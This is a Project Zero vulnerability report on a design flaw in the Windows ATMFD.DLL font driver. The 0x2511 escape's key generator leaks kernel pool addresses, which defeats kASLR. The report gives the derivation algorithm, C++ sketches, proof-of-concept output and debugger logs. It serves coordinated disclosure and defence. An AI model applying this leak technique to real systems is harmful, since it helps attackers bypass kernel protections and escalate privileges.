Status: WontFix
Closed: Nov 15



Windows Kernel ATMFD.DLL NamedEscape 0x2511 pool address derivation from entropy accumulator
Project Member Reported by mjurczyk@google.com, Oct 22
The OpenType ATMFD.DLL kernel-mode font driver on Windows has an undocumented "escape" interface, handled by the standard DrvEscape and DrvFontManagement functions implemented by the module. The interface is very similar to Buffered IOCTL in nature, and handles 13 different operation codes in the numerical range of 0x2502 to 0x2514. It is accessible to user-mode applications through an exported (but not documented) gdi32!NamedEscape function, which internally invokes the NtGdiExtEscape syscall.

It is difficult to understand the functionality and design of the various escape codes based on the ATMFD.DLL image alone, as no debug symbols are provided for it on the Microsoft Symbol Server. However, such symbols are available for the ATMLIB.DLL user-mode client library which uses the interface, and more importantly for fontdrvhost.exe, the sandboxed user-mode font driver on Windows 10, which shares most of its code with ATMFD. These two sources of information are invaluable in reverse-engineering the NamedEscape code area. All symbols referenced in this report were originally found in fontdrvhost.pdb, but can also be applied to the corresponding code in ATMFD.

Notably, the NamedEscape interface has already been subject to security vulnerabilities. Project Zero issue #473 describes a pool-based buffer underflow bug discovered in the HackingTeam dump in 2015 (escape 0x2514, BDGetSIDList), while issue #785 addresses pool corruption in escape code 0x250c (BDGetGlyphList).

The problem discussed in this report is not due to a programming error, but bad design. It can be triggered via escape code 0x2511 (BDSetHWID), whose functionality is not exactly obvious from the code. Its name ("set hardware id") and the fact that it shares some global objects with functions such as GetPlatformID, fa_VerifyPlatformBinding, fa_VerifyFontLicensing, IsCopyProtectedFont etc. suggest that it is related to some old font copy protection mechanism.

What is important is that with each BDSetHWID call, it is possible to obtain a 32-bit value generated by the GenerateKeyValue() function; this key should then normally be used to encrypt the hardware id passed to the driver. In pseudo-code, the GenerateKeyValue() routine is implemented as follows:

--- cut ---
  DWORD GenerateKeyValue() {
    DWORD tmp = lastMallocAddr ^ bswap32(lastMallocAddr) ^ 0xA4958CD4;
    lastMallocAddr = tmp ^ rol(lastMallocAddr, 5);
    return tmp;
  }
--- cut ---

Here, lastMallocAddr is a global 32-bit variable designed to accumulate entropy, which is then used to generate the key value. The entropy is obtained from addresses returned by the memory allocator, and mixed into lastMallocAddr in an ATMallocExt() wrapper function. A simplified version of the routine (in pseudo-code) is shown below:

--- cut ---
  PVOID ATMallocExt(SIZE_T size) {
    PVOID address = Allocate(size);
    if (address != NULL) {
      lastMallocAddr = (SIZE_T)address ^ rol(lastMallocAddr, 5);
    }
    return address;
  }
--- cut ---

To sum up, the routine mixes the addresses of various memory regions into the global seed, which is partially "accessible" to user-mode clients after a number of transformations. Now, the question is whether it is possible to derive the virtual memory addresses xored into lastMallocAddr by observing the output values of the GenerateKeyValue() function. If it were possible, it would enable local attackers to learn about the kernel address space layout, thus defeating the kASLR mitigation and potentially facilitating privilege escalation attacks using other vulnerabilities.
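For experimenting with the two routines outside the kernel, they can be modelled in plain C++. This is only a sketch based on the pseudo-code above, not the driver's actual code: the KeyModel structure, the MixAddress() method and the Rol32()/Bswap32() helpers are names made up for illustration.

```cpp
#include <cassert>
#include <cstdint>

// Rotate a 32-bit value left by n bits (0 < n < 32).
static inline uint32_t Rol32(uint32_t v, unsigned n) {
  assert(n > 0 && n < 32);
  return (v << n) | (v >> (32 - n));
}

// Reverse the byte order of a 32-bit value.
static inline uint32_t Bswap32(uint32_t v) {
  return (v >> 24) | ((v >> 8) & 0x0000FF00u) |
         ((v << 8) & 0x00FF0000u) | (v << 24);
}

// Hypothetical user-mode model of the driver's global accumulator.
struct KeyModel {
  uint32_t lastMallocAddr = 0;

  // Mirrors the side effect of a successful ATMallocExt() call.
  void MixAddress(uint32_t address) {
    lastMallocAddr = address ^ Rol32(lastMallocAddr, 5);
  }

  // Mirrors GenerateKeyValue(): returns the key and advances the state.
  uint32_t GenerateKeyValue() {
    uint32_t tmp = lastMallocAddr ^ Bswap32(lastMallocAddr) ^ 0xA4958CD4u;
    lastMallocAddr = tmp ^ Rol32(lastMallocAddr, 5);
    return tmp;
  }
};
```

With such a model, a hidden state can be chosen freely and the recovery logic discussed in the rest of the report can be checked against it before touching a real system.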

The first step to achieve the goal is to try and derive the current value of lastMallocAddr; with this, calculating the mixed-in addresses would be relatively simple (xor and rol are reversible operations). Unfortunately, the information returned by GenerateKeyValue() is very limited, specifically due to the following expression:

  lastMallocAddr ^ bswap32(lastMallocAddr)

The above construct means that we don't learn the exact value of lastMallocAddr, but receive a DWORD consisting of the following bytes: [#1 xor #4][#2 xor #3][#2 xor #3][#1 xor #4]. Effectively, we only learn about the relation of bytes #1/#4 and #2/#3, which leaves us with 256*256=65536 potential candidates for lastMallocAddr that could generate the specific seed we obtained. However, let's keep in mind that we can query GenerateKeyValue() multiple times and examine how the values change over time. In order to reduce the number of candidates, we can follow the steps listed below:

  1) Request GenerateKeyValue(), generate the first 65536 candidates.
  2) Request GenerateKeyValue() again, and check whether each existing candidate could have produced the obtained value in the next iteration. This reduces the set to 2048 candidates.
  3) Repeat step (2). This reduces the set to 256 candidates.

At this point, 256 is the minimum number of candidates we can cut the set down to with the limited information we receive; further iterations keep the list at 256 entries. By keeping track of the candidates throughout steps #1-#3, we can know their values at the beginning of the process, as well as at the end.
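Steps #1-#3 can be sketched in C++ as follows. This is a minimal illustration built on the pseudo-code of GenerateKeyValue() shown earlier, not an excerpt from poc.cpp; KeyOf(), NextState(), InitialCandidates(), ReduceCandidates() and kKeyConstant are hypothetical names. Each candidate is stored as the state it would have after the call that produced the observed key, so the list always tracks the current value of lastMallocAddr.

```cpp
#include <cassert>
#include <cstdint>
#include <vector>

static inline uint32_t Rol32(uint32_t v, unsigned n) {
  assert(n > 0 && n < 32);
  return (v << n) | (v >> (32 - n));
}

static inline uint32_t Bswap32(uint32_t v) {
  return (v >> 24) | ((v >> 8) & 0x0000FF00u) |
         ((v << 8) & 0x00FF0000u) | (v << 24);
}

constexpr uint32_t kKeyConstant = 0xA4958CD4u;

// Key that GenerateKeyValue() would return for a given state.
static uint32_t KeyOf(uint32_t state) {
  return state ^ Bswap32(state) ^ kKeyConstant;
}

// State left behind by GenerateKeyValue() for a given state.
static uint32_t NextState(uint32_t state) {
  return KeyOf(state) ^ Rol32(state, 5);
}

// Step 1: enumerate all 65536 states consistent with one observed key,
// and advance each of them past the call that produced it.
std::vector<uint32_t> InitialCandidates(uint32_t key) {
  const uint32_t p = key ^ kKeyConstant;   // state ^ bswap32(state)
  const uint32_t x14 = p >> 24;            // byte #1 xor byte #4
  const uint32_t x23 = (p >> 16) & 0xFFu;  // byte #2 xor byte #3
  std::vector<uint32_t> out;
  out.reserve(65536);
  for (uint32_t b1 = 0; b1 < 256; b1++) {
    for (uint32_t b2 = 0; b2 < 256; b2++) {
      uint32_t state =
          (b1 << 24) | (b2 << 16) | ((b2 ^ x23) << 8) | (b1 ^ x14);
      out.push_back(NextState(state));
    }
  }
  return out;
}

// Steps 2 and 3: keep only the candidates that reproduce the next
// observed key, and advance the survivors by one more call.
std::vector<uint32_t> ReduceCandidates(const std::vector<uint32_t>& candidates,
                                       uint32_t key) {
  std::vector<uint32_t> out;
  for (uint32_t state : candidates) {
    if (KeyOf(state) == key) {
      out.push_back(NextState(state));
    }
  }
  return out;
}
```

Feeding three consecutive keys derived from one hidden state through InitialCandidates() and two ReduceCandidates() calls yields sets of 65536, 2048 and 256 entries in this model, matching the counts above. The 256 survivors differ from the true state only by an xor mask whose four bytes are identical, and such a mask is invisible to the lastMallocAddr ^ bswap32(lastMallocAddr) expression, which is why further queries do not shrink the set.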

Even though it's not possible to determine the state of lastMallocAddr with absolute certainty, let's put this fact aside for a bit and consider how a virtual address could be derived based on it. The most important part is to make sure that ATMallocExt() is called exactly once between our lastMallocAddr measurements. One way to achieve this is with an AddFontResource() call, to trigger the loading of a Type-1 PostScript font with a malformed .PFM file (e.g. with out-of-bounds offsets etc.). An allocation of size 0x308 is then requested at the beginning of the LoadFontInternal() function:

--- cut ---
  .text:00016CC4                 push    1
  .text:00016CC6                 push    308h
  .text:00016CCB                 call    _ATMcalloc
--- cut ---

But before any further allocations are requested, ValidatePFMPointers() fails, causing SetupPFMMetrics() to fail, and eventually the whole font loading process to abort without any more ATMallocExt() calls. It's important to note, however, that the user-mode gdi32!AddFontResource() API invokes the NtGdiAddFontResourceW syscall a second time if the first one fails. This is the reason why the system call is used directly in our proof-of-concept program.

To summarize, we're now able to calculate the 256 possible values of lastMallocAddr, mix a virtual address into the variable, and calculate the new 256 candidates again. Since the malloc transformation is fully reversible, we can just pair every "before" candidate with every "after" candidate, resulting in 256*256=65536 candidates for the returned malloc() address. As it turns out, most of these candidates overlap, leaving us with just 256 unique potential addresses. These 256 32-bit values appear to have uniform bit distribution, so each predefined bit in the address divides the number of candidates by 2.
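The pairing step can be sketched as below. The code assumes the mixing formula from the ATMallocExt() pseudo-code, and the RecoverAddress() and AddressCandidates() names are hypothetical. Here `before` holds the candidate states right before the allocation and `after` holds the candidate states right after it.

```cpp
#include <cassert>
#include <cstdint>
#include <set>
#include <vector>

static inline uint32_t Rol32(uint32_t v, unsigned n) {
  assert(n > 0 && n < 32);
  return (v << n) | (v >> (32 - n));
}

// Inverts the mixing step: after = address ^ rol(before, 5).
static uint32_t RecoverAddress(uint32_t before, uint32_t after) {
  return after ^ Rol32(before, 5);
}

// Pairs every "before" candidate with every "after" candidate and
// collects the distinct addresses that would explain the transition.
std::set<uint32_t> AddressCandidates(const std::vector<uint32_t>& before,
                                     const std::vector<uint32_t>& after) {
  std::set<uint32_t> out;
  for (uint32_t b : before) {
    for (uint32_t a : after) {
      out.insert(RecoverAddress(b, a));
    }
  }
  return out;
}
```

Using a set makes the overlap visible directly: although 65536 pairs are examined, the number of distinct results is what matters for the subsequent filtering.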

On 32-bit systems, kernel addresses returned by the allocator are guaranteed to have the highest bit set, and be aligned to 8 bytes (three lowest bits cleared). The knowledge of these four bits cuts the number of candidate addresses down to 16. In our proof-of-concept program, the CheckKernelAddress() function determines if a specific value is a feasible address we intend to leak. If we define it as follows:

--- cut ---
  BOOL CheckKernelAddress(DWORD Address) {
    return ((Address >= 0x80000000) && ((Address & 0x7) == 0));
  }
--- cut ---

Then the output of our PoC in a test run on Windows 7 32-bit is:

--- cut ---
  [0] Generated 65536 candidates.
  [1] Reduced candidates from 65536 to 2048.
  [2] Reduced candidates from 2048 to 256.
  [0] Generated 65536 candidates.
  [1] Reduced candidates from 65536 to 2048.
  [2] Reduced candidates from 2048 to 256.
  Alloc candidates: 16
    87e1afd8
    8fe9a7e0
    97f1bfe8
    9ff9b7f0
    a7c18fb8
    afc987c0
    b7d19fc8
    bfd997d0
    c7a1ef98
    cfa9e7a0
    d7b1ffa8
    dfb9f7b0
    e781cf78
    ef89c780
    f791df88
    ff99d790
--- cut ---

Among those values is 0xff99d790, the actual allocation address, as witnessed in WinDbg:

--- cut ---
  0: kd> g
  Breakpoint 0 hit
  ATMFD+0x1456e:
  9c06456e 8bf8            mov     edi,eax

  3: kd> ? eax
  Evaluate expression: -6695024 = ff99d790

  3: kd> dd eax
  ff99d790  00000000 00000000 00000000 00000000
  ff99d7a0  00000000 00000000 00000000 00000000
  ff99d7b0  00000000 00000000 00000000 00000000
  ff99d7c0  00000000 00000000 00000000 00000000
  ff99d7d0  00000000 00000000 00000000 00000000
  ff99d7e0  00000000 00000000 00000000 00000000
  ff99d7f0  00000000 00000000 00000000 00000000
  ff99d800  00000000 00000000 00000000 00000000

  3: kd> !pool eax
  Pool page ff99d790 region is Paged session pool
  [...]
  *ff99d778 size:  328 previous size:  120  (Allocated) *Adbe
      Pooltag Adbe : Adobe's font driver
  [...]
--- cut ---

In order to further limit the number of possible addresses, we could assume the state of four more bits. The most convenient approach would be to have a large allocation requested (i.e. of size >= ~4096), which would then cause it to be placed at the beginning of a memory page, resulting in pre-determined values of the lowest 12 bits. Unfortunately, during a quick search we were unable to find a primitive making it possible to perform a single large allocation on request, so we had to work with the aforementioned 0x308-long one. On the other hand, we noticed during experimentation that all allocations we examined ended up at an address above 0xfe000000. If we assume that the leaked address will be higher than 0xf8000000 and aligned to 8 bytes, then we have 8 predefined bits and can determine the value of the other 24 bits (so the full address) with full certainty. This is illustrated below.

The CheckKernelAddress() function:

--- cut ---
  BOOL CheckKernelAddress(DWORD Address) {
    return ((Address >= 0xf8000000) && ((Address & 0x7) == 0));
  }
--- cut ---

The proof-of-concept output:

--- cut ---
  [0] Generated 65536 candidates.
  [1] Reduced candidates from 65536 to 2048.
  [2] Reduced candidates from 2048 to 256.
  [0] Generated 65536 candidates.
  [1] Reduced candidates from 65536 to 2048.
  [2] Reduced candidates from 2048 to 256.
  Alloc candidates: 1
    ff980018
--- cut ---

And the WinDbg console log:

--- cut ---
  Breakpoint 0 hit
  ATMFD+0x1456e:
  9c06456e 8bf8            mov     edi,eax

  1: kd> ? eax
  Evaluate expression: -6815720 = ff980018

  1: kd> dd eax
  ff980018  00000000 00000000 00000000 00000000
  ff980028  00000000 00000000 00000000 00000000
  ff980038  00000000 00000000 00000000 00000000
  ff980048  00000000 00000000 00000000 00000000
  ff980058  00000000 00000000 00000000 00000000
  ff980068  00000000 00000000 00000000 00000000
  ff980078  00000000 00000000 00000000 00000000
  ff980088  00000000 00000000 00000000 00000000

  1: kd> !pool eax
  Pool page ff980018 region is Paged session pool
  *ff980000 size:  328 previous size:    0  (Allocated) *Adbe
      Pooltag Adbe : Adobe's font driver
  [...]
--- cut ---

The above example demonstrates that the leak was successful and the kernel address was fully derived based on lastMallocAddr and the GenerateKeyValue() function output. The attack is most useful on 32-bit editions of Windows 7 and 8, as they allow user-mode clients to freely interact with the ATMFD driver and leak the full 32-bit kernel addresses.
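As a cross-check of the two CheckKernelAddress() variants, both can be applied to the 16 candidates printed by the first test run. The sketch below is not taken from poc.cpp; FilterCandidates(), CheckLoose(), CheckStrict() and kFirstRunCandidates are illustrative names, and the values are copied from the output listed earlier.

```cpp
#include <cassert>
#include <cstdint>
#include <vector>

// Highest bit set and 8-byte alignment (first variant in this report).
static bool CheckLoose(uint32_t a) {
  return a >= 0x80000000u && (a & 0x7u) == 0;
}

// Top five bits set and 8-byte alignment (second variant).
static bool CheckStrict(uint32_t a) {
  return a >= 0xf8000000u && (a & 0x7u) == 0;
}

// Returns the candidates accepted by the given predicate.
std::vector<uint32_t> FilterCandidates(const std::vector<uint32_t>& in,
                                       bool (*pred)(uint32_t)) {
  assert(pred != nullptr);
  std::vector<uint32_t> out;
  for (uint32_t a : in) {
    if (pred(a)) out.push_back(a);
  }
  return out;
}

// The 16 candidates from the first proof-of-concept run.
const std::vector<uint32_t> kFirstRunCandidates = {
    0x87e1afd8u, 0x8fe9a7e0u, 0x97f1bfe8u, 0x9ff9b7f0u,
    0xa7c18fb8u, 0xafc987c0u, 0xb7d19fc8u, 0xbfd997d0u,
    0xc7a1ef98u, 0xcfa9e7a0u, 0xd7b1ffa8u, 0xdfb9f7b0u,
    0xe781cf78u, 0xef89c780u, 0xf791df88u, 0xff99d790u,
};
```

All 16 values pass CheckLoose(), while only 0xff99d790 passes CheckStrict(), which is the address observed in WinDbg during that run.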

On 64-bit platforms, the attack also works, but since the variable types used in BDSetHWID are still 32-bit, it is only possible to leak the lower 32 bits of kernel addresses.
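The effect of the 32-bit variable on x64 can be illustrated with a short sketch. It assumes that the pointer is simply truncated when it is mixed into the accumulator, as the ATMallocExt() pseudo-code suggests; MixAddress64() is a hypothetical name and the sample address in the usage note is made up.

```cpp
#include <cassert>
#include <cstdint>

static inline uint32_t Rol32(uint32_t v, unsigned n) {
  assert(n > 0 && n < 32);
  return (v << n) | (v >> (32 - n));
}

// Mixes a 64-bit pointer value into a 32-bit accumulator. The cast
// discards the upper 32 bits, so they never influence the state.
uint32_t MixAddress64(uint32_t lastMallocAddr, uint64_t address) {
  return static_cast<uint32_t>(address) ^ Rol32(lastMallocAddr, 5);
}
```

For example, MixAddress64(0, 0xfffff8a012345678) yields 0x12345678, and any other address with the same lower half produces the same state, so the upper half cannot be recovered from the key values.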

On Windows 10, one can still invoke the NamedEscape code in ATMFD from user space, and so the attack should work in theory. However, since the kernel driver is no longer used to load and parse fonts (the task was offloaded to fontdrvhost.exe), we haven't found a way to trigger the necessary ATMallocExt() call to request the leaked allocation in the first place. One idea around it was to try to leak the addresses returned by the allocator while the driver was loading, but as there are a total of 8 ATMallocExt() calls in the process, the information is combined and lost at the high granularity we're interested in.

The proof-of-concept code is designed for Windows 7 32-bit, but could be easily ported to other systems by adjusting the hardcoded NtGdiAddFontResourceW system call number, or implementing a 64-bit syscall stub (for x64 platforms).

An intuitive way of fixing the bug is to change the source of entropy from kernel addresses to a proper crypto API (or some lesser PRNG if high-quality random numbers are not required), or to remove the specific escape code altogether, if it's not used by any user-mode clients anymore.

This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public.
 
poc.cpp
6.9 KB
Project Member Comment 1 by mjurczyk@google.com, Oct 22
poc.pfb
2 bytes
poc.pfm
106 bytes
Project Member Comment 2 by mjurczyk@google.com, Oct 23
Labels: Reported-2017-Oct-23
Project Member Comment 3 by mjurczyk@google.com, Oct 24
Labels: MSRC-41770
Project Member Comment 4 by mjurczyk@google.com, Nov 15
Labels: -Restrict-View-Commit
Status: WontFix
MSRC have responded that the bug is an inherent design weakness that cannot be addressed through a single security update, but would require significant restructuring of the system's address space management. As a result, the case was closed as a security issue on Microsoft's end, but will be tracked to be fixed in a future release of Windows 10.